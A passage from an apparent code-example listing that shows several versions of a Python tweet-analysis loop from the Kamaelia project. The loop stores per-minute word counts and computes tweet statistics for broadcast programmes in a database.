                self.db_select("""SELECT tid,pid,timestamp,text,tweet_id,programme_position FROM rawdata WHERE analysed = 0 ORDER BY tid LIMIT 5000""")
                data = self.db_fetchall()

                # Cycle through all the as yet unanalysed tweets
                for result in data:
                    tid = result[0]
                    pid = result[1]
                    tweettime = result[2] # Timestamp based on the tweet's created_at field
                    tweettext = result[3]
                    tweetid = result[4] # This is the real tweet ID, tid just makes a unique identifier as each tweet can be stored against several pids
                    progpos = result[5] # Position through the programme that the tweet was made
                    dbtime = datetime.utcfromtimestamp(tweettime)
                    # Each tweet will be grouped into chunks of one minute to make display better, so set the seconds to zero
                    # This particular time is only used for console display now as a more accurate one calculated from programme position is found later
                    dbtime = dbtime.replace(second=0)
                    Print("Analysis component: Analysing new tweet for pid", pid, "(" , dbtime ,"):")
                    try:
                        Print("Analysis component: '" , tweettext , "'")
                    except UnicodeEncodeError:
                        e = sys.exc_info()[1]
                        Print ("UnicodeEncodeError", e)
                    self.db_select("""SELECT duration FROM programmes_unique WHERE pid = %s""",(pid))
                    progdata = self.db_fetchone()
                    duration = progdata[0]
                    self.db_select("""SELECT totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timediff,timestamp,utcoffset FROM programmes WHERE pid = %s ORDER BY timestamp DESC""",(pid))
                    progdata2 = self.db_fetchone()
                    totaltweets = progdata2[0]
                    # Increment the total tweets recorded for this programme's broadcast
                    totaltweets += 1
                    meantweets = progdata2[1]
                    mediantweets = progdata2[2]
                    modetweets = progdata2[3]
                    stdevtweets = progdata2[4]
                    timediff = progdata2[5]
                    timestamp = progdata2[6]
                    utcoffset = progdata2[7]

                    # Need to work out the timestamp to assign to the entry in analysed data
                    progstart = timestamp - timediff
                    progmins = int(progpos / 60)
                    analysedstamp = int(progstart + (progmins * 60))
                    # Ensure that this tweet occurs within the length of the programme, otherwise for the purposes of this program it's useless

                    if progpos > 0 and progpos <= duration:
                        self.db_select("""SELECT did,totaltweets,wordfreqexpected,wordfrequnexpected FROM analyseddata WHERE pid = %s AND timestamp = %s""",(pid,analysedstamp))
                        analyseddata = self.db_fetchone()
                        # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                        #failcounter = 0
                        # Pass this tweet to the NLTK analysis component
                        self.send([pid,tweetid],"nltk")
#                        print "BUM", 1
                        while not self.dataReady("nltk"):
                        #    if failcounter >= 3000:
                        #        nltkdata = list()
                        #        break
                            time.sleep(0.01)
                        #    failcounter += 1
                        #if failcounter < 3000:
#                        print "BUM", 2
                        if 1:
                            # Receive back a list of words and their frequency for this tweet, including whether or not they are common, an entity etc
                            nltkdata = self.recv("nltk")
                        if analyseddata == None: # No tweets yet recorded for this minute
                            minutetweets = 1
                            self.db_insert("""INSERT INTO analyseddata (pid,totaltweets,timestamp) VALUES (%s,%s,%s)""", (pid,minutetweets,analysedstamp))
                            for word in nltkdata:
                                # Check if we're storing a word or phrase here
                                if nltkdata[word][0] == 1:
                                    self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                        else:
                            did = analyseddata[0]
                            minutetweets = analyseddata[1] # Get current number of tweets for this minute
                            minutetweets += 1 # Add one to it for this tweet

                            self.db_update("""UPDATE analyseddata SET totaltweets = %s WHERE did = %s""",(minutetweets,did))

                            for word in nltkdata:
                                # Check if we're storing a word or phrase
                                if nltkdata[word][0] == 1:
                                    self.db_select("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND phrase LIKE %s""",(pid,analysedstamp,word))
                                    # Check if this phrase has already been stored for this minute - if so, increment the count
                                    wordcheck = self.db_fetchone()
                                    if wordcheck == None:
                                        self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                    else:
                                        self.db_update("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                                else:
                                    self.db_select("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND word LIKE %s""",(pid,analysedstamp,word))
                                    # Check if this word has already been stored for this minute - if so, increment the count
                                    wordcheck = self.db_fetchone()
                                    if wordcheck == None:
                                        self.db_insert("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                    else:
                                        self.db_update("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                        # Averages / stdev are calculated roughly based on the programme's running time at this point
                        progdate = datetime.utcfromtimestamp(timestamp) + timedelta(seconds=utcoffset)
                        actualstart = progdate - timedelta(seconds=timediff)
                        actualtweettime = datetime.utcfromtimestamp(tweettime + utcoffset)

                        # Calculate how far through the programme this tweet occurred
                        runningtime = actualtweettime - actualstart
                        runningtime = runningtime.seconds

                        if runningtime < 0:
                            runningtime = 0
                        else:
                            runningtime = float(runningtime) / 60

                        try:
                            meantweets = totaltweets / runningtime
                        except ZeroDivisionError:
                            meantweets = 0

                        self.db_select("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,progstart,analysedstamp+duration))
                        analyseddata = self.db_fetchall()

                        runningtime = int(runningtime)

                        tweetlist = list()
                        for result in analyseddata:
                            totaltweetsmin = result[0]
                            # Create a list of each minute and the total tweets for that minute in the programme
                            tweetlist.append(int(totaltweetsmin))

                        # Ensure tweetlist has enough entries
                        # If a minute has no tweets, it won't have a database record, so this has to be added
                        if len(tweetlist) < runningtime:
                            additions = runningtime - len(tweetlist)
                            while additions > 0:
                                tweetlist.append(0)
                                additions -= 1

                        # Order by programme position 0,1,2, mins etc
                        tweetlist.sort()

                        mediantweets = tweetlist[int(len(tweetlist)/2)]

                        modes = dict()
                        stdevlist = list()
                        for tweet in tweetlist:
                            modes[tweet] = tweetlist.count(tweet)
                            stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                        modeitems = [[v, k] for k, v in modes.items()]
                        modeitems.sort(reverse=True)
                        modetweets = int(modeitems[0][1])

                        stdevtweets = 0
                        for val in stdevlist:
                            stdevtweets += val

                        try:
                            stdevtweets = math.sqrt(stdevtweets / runningtime)
                        except ZeroDivisionError:
                            stdevtweets = 0

                        # Finished analysis - update DB
                        self.db_update("""UPDATE programmes SET totaltweets = %s, meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s WHERE pid = %s AND timestamp = %s""",(totaltweets,meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))

                    else:
                        pass
                        # Print("Analysis component: Skipping tweet - falls outside the programme's running time")

                    # Mark the tweet as analysed
                    self.db_update("""UPDATE rawdata SET analysed = 1 WHERE tid = %s""",(tid))
                    Print("Analysis component: Done!")

                # Stage 2: If all raw tweets analysed and imported = 1 (all data for this programme stored and programme finished), finalise the analysis - could do bookmark identification here too?
                self.db_select("""SELECT pid,totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timestamp,timediff FROM programmes WHERE imported = 1 AND analysed = 0 LIMIT 5000""")
                data = self.db_fetchall()
                # Cycle through each programme that's ready for final analysis
                for result in data:
                    pid = result[0]
                    self.db_select("""SELECT duration,title FROM programmes_unique WHERE pid = %s""",(pid))
                    data2 = self.db_fetchone()
                    if not data2:
                        Print("Getting data for duration,title, etc failed - pid", pid)
                        Print("Let's try skipping this pid")
                        continue
                    duration = data2[0]
                    totaltweets = result[1]
                    meantweets = result[2]
                    mediantweets = result[3]
                    modetweets = result[4]
                    stdevtweets = result[5]
                    title = data2[1]
                    timestamp = result[6]
                    timediff = result[7]
                    # Cycle through checking if all tweets for this programme have been analysed - if so finalise the stats
                    self.db_select("""SELECT tid FROM rawdata WHERE analysed = 0 AND pid = %s""", (pid))
                    if self.db_fetchone() == None:
                        # OK to finalise stats here
                        Print("Analysis component: Finalising stats for pid:", pid, "(" , title , ")")
                        meantweets = float(totaltweets) / (duration / 60) # Mean tweets per minute
                        self.db_select("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,timestamp-timediff,timestamp+duration-timediff))
                        analyseddata = self.db_fetchall()

                        runningtime = duration / 60

                        tweetlist = list()
                        for result in analyseddata:
                            totaltweetsmin = result[0]
                            tweetlist.append(int(totaltweetsmin))

                        # Ensure tweetlist has enough entries - as above, if no tweets are recorded for a minute it won't be present in the DB
                        if len(tweetlist) < runningtime:
                            additions = runningtime - len(tweetlist)
                            while additions > 0:
                                tweetlist.append(0)
                                additions -= 1

                        tweetlist.sort()

                        mediantweets = tweetlist[int(len(tweetlist)/2)]

                        modes = dict()
                        stdevlist = list()
                        for tweet in tweetlist:
                            modes[tweet] = tweetlist.count(tweet)
                            stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                        modeitems = [[v, k] for k, v in modes.items()]
                        modeitems.sort(reverse=True)
                        modetweets = int(modeitems[0][1])

                        stdevtweets = 0
                        for val in stdevlist:
                            stdevtweets += val
                        try:
                            stdevtweets = math.sqrt(stdevtweets / runningtime)
                        except ZeroDivisionError:
                            stdevtweets = 0

                        if 1: # This data is purely a readout to the terminal at the moment associated with word and phrase frequency, and retweets
                            sqltimestamp1 = timestamp - timediff
                            sqltimestamp2 = timestamp + duration - timediff
                            self.db_select("""SELECT tweet_id FROM rawdata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""", (pid,sqltimestamp1,sqltimestamp2))
                            rawtweetids = self.db_fetchall()
                            tweetids = list()
                            for tweet in rawtweetids:
                                tweetids.append(tweet[0])

                            if len(tweetids) > 0:
                                # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 10 secs)
                                failcounter = 0
                                self.send([pid,tweetids],"nltkfinal")
                                while not self.dataReady("nltkfinal"):
                                    if failcounter >= 1000:
                                        Print("Timed out waiting for NTLKFINAL")
                                        nltkdata = list()
                                        break
                                    time.sleep(0.01)

                                    failcounter += 1
                                    if failcounter %100 == 0:
                                        Print( "Hanging waiting for NLTKFINAL" )

                                Print("failcounter (<1000 is success)", failcounter)
                                if failcounter < 1000:
#                                if 1:
                                    nltkdata = self.recv("nltkfinal")

                        self.db_update("""UPDATE programmes SET meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s, analysed = 1 WHERE pid = %s AND timestamp = %s""",(meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))
                        Print("Analysis component: Done!")

                # Sleep here until more data is available to analyse
                Print("Analysis component: Sleeping for 10 seconds...")
                time.sleep(10)

Example 14

Project: kamaelia_
Source File: LiveAnalysis.py
View license
    def main(self):
        # Calculate running total and mean etc

        cursor = self.dbConnect(self.dbuser,self.dbpass)
        while not self.finished():
            # The below does LIVE and FINAL analysis - do NOT run DataAnalyser at the same time

            print "Analysis component: Checking for new data..."

            # Stage 1: Live analysis - could do with a better way to do the first query (indexed field 'analsed' to speed up for now)
            # Could move this into the main app to take a copy of tweets on arrival, but would rather solve separately if poss
            cursor.execute("""SELECT tid,pid,timestamp,text,tweet_id,programme_position FROM rawdata WHERE analysed = 0 ORDER BY tid LIMIT 5000""")
            data = cursor.fetchall()

            # Cycle through all the as yet unanalysed tweets
            for result in data:
                tid = result[0]
                pid = result[1]
                tweettime = result[2] # Timestamp based on the tweet's created_at field
                tweettext = result[3]
                tweetid = result[4] # This is the real tweet ID, tid just makes a unique identifier as each tweet can be stored against several pids
                progpos = result[5] # Position through the programme that the tweet was made
                dbtime = datetime.utcfromtimestamp(tweettime)
                # Each tweet will be grouped into chunks of one minute to make display better, so set the seconds to zero
                # This particular time is only used for console display now as a more accurate one calculated from programme position is found later
                dbtime = dbtime.replace(second=0)
                print "Analysis component: Analysing new tweet for pid", pid, "(" + str(dbtime) + "):"
                print "Analysis component: '" + tweettext + "'"
                cursor.execute("""SELECT duration FROM programmes_unique WHERE pid = %s""",(pid))
                progdata = cursor.fetchone()
                duration = progdata[0]
                cursor.execute("""SELECT totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timediff,timestamp,utcoffset FROM programmes WHERE pid = %s ORDER BY timestamp DESC""",(pid))
                progdata2 = cursor.fetchone()
                totaltweets = progdata2[0]
                # Increment the total tweets recorded for this programme's broadcast
                totaltweets += 1
                meantweets = progdata2[1]
                mediantweets = progdata2[2]
                modetweets = progdata2[3]
                stdevtweets = progdata2[4]
                timediff = progdata2[5]
                timestamp = progdata2[6]
                utcoffset = progdata2[7]

                # Need to work out the timestamp to assign to the entry in analysed data
                progstart = timestamp - timediff
                progmins = int(progpos / 60)
                analysedstamp = int(progstart + (progmins * 60))
                # Ensure that this tweet occurs within the length of the programme, otherwise for the purposes of this program it's useless
                if progpos > 0 and progpos <= duration:
                    cursor.execute("""SELECT did,totaltweets,wordfreqexpected,wordfrequnexpected FROM analyseddata WHERE pid = %s AND timestamp = %s""",(pid,analysedstamp))
                    analyseddata = cursor.fetchone()
                    # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                    failcounter = 0
                    # Pass this tweet to the NLTK analysis component
                    self.send([pid,tweetid],"nltk")
                    while not self.dataReady("nltk"):
                    #    if failcounter >= 3000:
                    #        nltkdata = list()
                    #        break
                        time.sleep(0.01)
                    #    failcounter += 1
                    #if failcounter < 3000:
                        # Receive back a list of words and their frequency for this tweet, including whether or not they are common, an entity etc
                    if 1:
                        nltkdata = self.recv("nltk")
                    if analyseddata == None: # No tweets yet recorded for this minute
                        minutetweets = 1
                        cursor.execute("""INSERT INTO analyseddata (pid,totaltweets,timestamp) VALUES (%s,%s,%s)""", (pid,minutetweets,analysedstamp))
                        for word in nltkdata:
                            # Check if we're storing a word or phrase here
                            if nltkdata[word][0] == 1:
                                cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                            else:
                                cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                    else:
                        did = analyseddata[0]
                        minutetweets = analyseddata[1] # Get current number of tweets for this minute
                        minutetweets += 1 # Add one to it for this tweet

                        cursor.execute("""UPDATE analyseddata SET totaltweets = %s WHERE did = %s""",(minutetweets,did))

                        for word in nltkdata:
                            # Check if we're storing a word or phrase
                            if nltkdata[word][0] == 1:
                                cursor.execute("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND phrase LIKE %s""",(pid,analysedstamp,word))
                                # Check if this phrase has already been stored for this minute - if so, increment the count
                                wordcheck = cursor.fetchone()
                                if wordcheck == None:
                                    cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    cursor.execute("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                            else:
                                cursor.execute("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND word LIKE %s""",(pid,analysedstamp,word))
                                # Check if this word has already been stored for this minute - if so, increment the count
                                wordcheck = cursor.fetchone()
                                if wordcheck == None:
                                    cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    cursor.execute("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                    # Averages / stdev are calculated roughly based on the programme's running time at this point
                    progdate = datetime.utcfromtimestamp(timestamp) + timedelta(seconds=utcoffset)
                    actualstart = progdate - timedelta(seconds=timediff)
                    actualtweettime = datetime.utcfromtimestamp(tweettime + utcoffset)

                    # Calculate how far through the programme this tweet occurred
                    runningtime = actualtweettime - actualstart
                    runningtime = runningtime.seconds

                    if runningtime < 0:
                        runningtime = 0
                    else:
                        runningtime = float(runningtime) / 60

                    try:
                        meantweets = totaltweets / runningtime
                    except ZeroDivisionError, e:
                        meantweets = 0

                    cursor.execute("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,progstart,analysedstamp+duration))
                    analyseddata = cursor.fetchall()

                    runningtime = int(runningtime)

                    tweetlist = list()
                    for result in analyseddata:
                        totaltweetsmin = result[0]
                        # Create a list of each minute and the total tweets for that minute in the programme
                        tweetlist.append(int(totaltweetsmin))

                    # Ensure tweetlist has enough entries
                    # If a minute has no tweets, it won't have a database record, so this has to be added
                    if len(tweetlist) < runningtime:
                        additions = runningtime - len(tweetlist)
                        while additions > 0:
                            tweetlist.append(0)
                            additions -= 1

                    # Order by programme position 0,1,2, mins etc
                    tweetlist.sort()

                    mediantweets = tweetlist[int(len(tweetlist)/2)]

                    modes = dict()
                    stdevlist = list()
                    for tweet in tweetlist:
                        modes[tweet] = tweetlist.count(tweet)
                        stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                    modeitems = [[v, k] for k, v in modes.items()]
                    modeitems.sort(reverse=True)
                    modetweets = int(modeitems[0][1])

                    stdevtweets = 0
                    for val in stdevlist:
                        stdevtweets += val

                    try:
                        stdevtweets = math.sqrt(stdevtweets / runningtime)
                    except ZeroDivisionError, e:
                        stdevtweets = 0

                    # Finished analysis - update DB
                    cursor.execute("""UPDATE programmes SET totaltweets = %s, meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s WHERE pid = %s AND timestamp = %s""",(totaltweets,meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))

                else:
                    print "Analysis component: Skipping tweet - falls outside the programme's running time"

                # Mark the tweet as analysed
                cursor.execute("""UPDATE rawdata SET analysed = 1 WHERE tid = %s""",(tid))
                print "Analysis component: Done!"

            # Stage 2: If all raw tweets analysed and imported = 1 (all data for this programme stored and programme finished), finalise the analysis - could do bookmark identification here too?
            cursor.execute("""SELECT pid,totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timestamp,timediff FROM programmes WHERE imported = 1 AND analysed = 0 LIMIT 5000""")
            data = cursor.fetchall()
            # Cycle through each programme that's ready for final analysis
            for result in data:
                pid = result[0]
                cursor.execute("""SELECT duration,title FROM programmes_unique WHERE pid = %s""",(pid))
                data2 = cursor.fetchone()
                duration = data2[0]
                totaltweets = result[1]
                meantweets = result[2]
                mediantweets = result[3]
                modetweets = result[4]
                stdevtweets = result[5]
                title = data2[1]
                timestamp = result[6]
                timediff = result[7]
                # Cycle through checking if all tweets for this programme have been analysed - if so finalise the stats
                cursor.execute("""SELECT tid FROM rawdata WHERE analysed = 0 AND pid = %s""", (pid))
                if cursor.fetchone() == None:
                    # OK to finalise stats here
                    print "Analysis component: Finalising stats for pid:", pid, "(" + title + ")"

                    meantweets = float(totaltweets) / (duration / 60) # Mean tweets per minute

                    cursor.execute("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,timestamp-timediff,timestamp+duration-timediff))
                    analyseddata = cursor.fetchall()

                    runningtime = duration / 60

                    tweetlist = list()
                    for result in analyseddata:
                        totaltweetsmin = result[0]
                        tweetlist.append(int(totaltweetsmin))

                    # Ensure tweetlist has enough entries - as above, if no tweets are recorded for a minute it won't be present in the DB
                    if len(tweetlist) < runningtime:
                        additions = runningtime - len(tweetlist)
                        while additions > 0:
                            tweetlist.append(0)
                            additions -= 1

                    tweetlist.sort()

                    mediantweets = tweetlist[int(len(tweetlist)/2)]

                    modes = dict()
                    stdevlist = list()
                    for tweet in tweetlist:
                        modes[tweet] = tweetlist.count(tweet)
                        stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                    modeitems = [[v, k] for k, v in modes.items()]
                    modeitems.sort(reverse=True)
                    modetweets = int(modeitems[0][1])

                    stdevtweets = 0
                    for val in stdevlist:
                        stdevtweets += val
                    try:
                        stdevtweets = math.sqrt(stdevtweets / runningtime)
                    except ZeroDivisionError, e:
                        stdevtweets = 0

                    if 1: # This data is purely a readout to the terminal at the moment associated with word and phrase frequency, and retweets
                        sqltimestamp1 = timestamp - timediff
                        sqltimestamp2 = timestamp + duration - timediff
                        cursor.execute("""SELECT tweet_id FROM rawdata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""", (pid,sqltimestamp1,sqltimestamp2))
                        rawtweetids = cursor.fetchall()
                        tweetids = list()
                        for tweet in rawtweetids:
                            tweetids.append(tweet[0])

                        if len(tweetids) > 0:
                            # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                            failcounter = 0
                            self.send([pid,tweetids],"nltkfinal")
                            while not self.dataReady("nltkfinal"):
                            #    if failcounter >= 3000:
                            #        nltkdata = list()
                            #        break
                                time.sleep(0.01)
                            #    failcounter += 1
                            #if failcounter < 3000:
                            if 1:
                                nltkdata = self.recv("nltkfinal")

                    cursor.execute("""UPDATE programmes SET meantweets = %s, mediantweets = %s, modetweets = %s, stdevtweets = %s, analysed = 1 WHERE pid = %s AND timestamp = %s""",(meantweets,mediantweets,modetweets,stdevtweets,pid,timestamp))
                    print "Analysis component: Done!"

            # Sleep here until more data is available to analyse
            print "Analysis component: Sleeping for 10 seconds..."
            time.sleep(10)

Example 15

Project: kamaelia_
Source File: LiveAnalysis.py
View license
    def main(self):
        # Calculate running total and mean etc

        cursor = self.dbConnect(self.dbuser,self.dbpass)
        while not self.finished():
            # The below does LIVE and FINAL analysis - do NOT run DataAnalyser at the same time

            print "Analysis component: Checking for new data..."

            # Stage 1: Live analysis - could do with a better way to do the first query (indexed field 'analsed' to speed up for now)
            # Could move this into the main app to take a copy of tweets on arrival, but would rather solve separately if poss
            cursor.execute("""SELECT tid,pid,timestamp,text,tweet_id,programme_position FROM rawdata WHERE analysed = 0 ORDER BY tid LIMIT 5000""")
            data = cursor.fetchall()

            # Cycle through all the as yet unanalysed tweets
            for result in data:
                tid = result[0]
                pid = result[1]
                tweettime = result[2] # Timestamp based on the tweet's created_at field
                tweettext = result[3]
                tweetid = result[4] # This is the real tweet ID, tid just makes a unique identifier as each tweet can be stored against several pids
                progpos = result[5] # Position through the programme that the tweet was made
                dbtime = datetime.utcfromtimestamp(tweettime)
                # Each tweet will be grouped into chunks of one minute to make display better, so set the seconds to zero
                # This particular time is only used for console display now as a more accurate one calculated from programme position is found later
                dbtime = dbtime.replace(second=0)
                print "Analysis component: Analysing new tweet for pid", pid, "(" + str(dbtime) + "):"
                print "Analysis component: '" + tweettext + "'"
                cursor.execute("""SELECT duration FROM programmes_unique WHERE pid = %s""",(pid))
                progdata = cursor.fetchone()
                duration = progdata[0]
                cursor.execute("""SELECT totaltweets,meantweets,mediantweets,modetweets,stdevtweets,timediff,timestamp,utcoffset FROM programmes WHERE pid = %s ORDER BY timestamp DESC""",(pid))
                progdata2 = cursor.fetchone()
                totaltweets = progdata2[0]
                # Increment the total tweets recorded for this programme's broadcast
                totaltweets += 1
                meantweets = progdata2[1]
                mediantweets = progdata2[2]
                modetweets = progdata2[3]
                stdevtweets = progdata2[4]
                timediff = progdata2[5]
                timestamp = progdata2[6]
                utcoffset = progdata2[7]

                # Need to work out the timestamp to assign to the entry in analysed data
                progstart = timestamp - timediff
                progmins = int(progpos / 60)
                analysedstamp = int(progstart + (progmins * 60))
                # Ensure that this tweet occurs within the length of the programme, otherwise for the purposes of this program it's useless
                if progpos > 0 and progpos <= duration:
                    cursor.execute("""SELECT did,totaltweets,wordfreqexpected,wordfrequnexpected FROM analyseddata WHERE pid = %s AND timestamp = %s""",(pid,analysedstamp))
                    analyseddata = cursor.fetchone()
                    # Just in case of a missing raw json object (ie. programme terminated before it was stored - allow it to be skipped if not found after 30 secs)
                    #failcounter = 0
                    # Pass this tweet to the NLTK analysis component
                    self.send([pid,tweetid],"nltk")
                    while not self.dataReady("nltk"):
                    #    if failcounter >= 3000:
                    #        nltkdata = list()
                    #        break
                        time.sleep(0.01)
                    #    failcounter += 1
                    #if failcounter < 3000:
                    if 1:
                        # Receive back a list of words and their frequency for this tweet, including whether or not they are common, an entity etc
                        nltkdata = self.recv("nltk")
                    if analyseddata == None: # No tweets yet recorded for this minute
                        minutetweets = 1
                        cursor.execute("""INSERT INTO analyseddata (pid,totaltweets,timestamp) VALUES (%s,%s,%s)""", (pid,minutetweets,analysedstamp))
                        for word in nltkdata:
                            # Check if we're storing a word or phrase here
                            if nltkdata[word][0] == 1:
                                cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                            else:
                                cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                    else:
                        did = analyseddata[0]
                        minutetweets = analyseddata[1] # Get current number of tweets for this minute
                        minutetweets += 1 # Add one to it for this tweet

                        cursor.execute("""UPDATE analyseddata SET totaltweets = %s WHERE did = %s""",(minutetweets,did))

                        for word in nltkdata:
                            # Check if we're storing a word or phrase
                            if nltkdata[word][0] == 1:
                                cursor.execute("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND phrase LIKE %s""",(pid,analysedstamp,word))
                                # Check if this phrase has already been stored for this minute - if so, increment the count
                                wordcheck = cursor.fetchone()
                                if wordcheck == None:
                                    cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,phrase,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    cursor.execute("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                            else:
                                cursor.execute("""SELECT wid,count FROM wordanalysis WHERE pid = %s AND timestamp = %s AND word LIKE %s""",(pid,analysedstamp,word))
                                # Check if this word has already been stored for this minute - if so, increment the count
                                wordcheck = cursor.fetchone()
                                if wordcheck == None:
                                    cursor.execute("""INSERT INTO wordanalysis (pid,timestamp,word,count,is_keyword,is_entity,is_common) VALUES (%s,%s,%s,%s,%s,%s,%s)""", (pid,analysedstamp,word,nltkdata[word][1],nltkdata[word][2],nltkdata[word][3],nltkdata[word][4]))
                                else:
                                    cursor.execute("""UPDATE wordanalysis SET count = %s WHERE wid = %s""",(nltkdata[word][1] + wordcheck[1],wordcheck[0]))
                    # Averages / stdev are calculated roughly based on the programme's running time at this point
                    progdate = datetime.utcfromtimestamp(timestamp) + timedelta(seconds=utcoffset)
                    actualstart = progdate - timedelta(seconds=timediff)
                    actualtweettime = datetime.utcfromtimestamp(tweettime + utcoffset)

                    # Calculate how far through the programme this tweet occurred
                    runningtime = actualtweettime - actualstart
                    runningtime = runningtime.seconds

                    if runningtime < 0:
                        runningtime = 0
                    else:
                        runningtime = float(runningtime) / 60

                    try:
                        meantweets = totaltweets / runningtime
                    except ZeroDivisionError, e:
                        meantweets = 0

                    cursor.execute("""SELECT totaltweets FROM analyseddata WHERE pid = %s AND timestamp >= %s AND timestamp < %s""",(pid,progstart,analysedstamp+duration))
                    analyseddata = cursor.fetchall()

                    runningtime = int(runningtime)

                    tweetlist = list()
                    for result in analyseddata:
                        totaltweetsmin = result[0]
                        # Create a list of each minute and the total tweets for that minute in the programme
                        tweetlist.append(int(totaltweetsmin))

                    # Ensure tweetlist has enough entries
                    # If a minute has no tweets, it won't have a database record, so this has to be added
                    if len(tweetlist) < runningtime:
                        additions = runningtime - len(tweetlist)
                        while additions > 0:
                            tweetlist.append(0)
                            additions -= 1

                    # Order by programme position 0,1,2, mins etc
                    tweetlist.sort()

                    mediantweets = tweetlist[int(len(tweetlist)/2)]

                    modes = dict()
                    stdevlist = list()
                    for tweet in tweetlist:
                        modes[tweet] = tweetlist.count(tweet)
                        stdevlist.append((tweet - meantweets)*(tweet - meantweets))

                    modeitems = [[v, k] for k, v in modes.items()]
                    modeitems.sort(reverse=True)
                    modetweets = int(modeitems[0][1])

                    stdevtweets = 0
                    for val in stdevlist:
                        stdevtweets += val

                    try:
                        stdevtweets = math.sqrt(stdevtweets / runningtime)
                    except ZeroDivisionError, e:
                        stdevtweets = 0

                    # Finished analysis - update DB
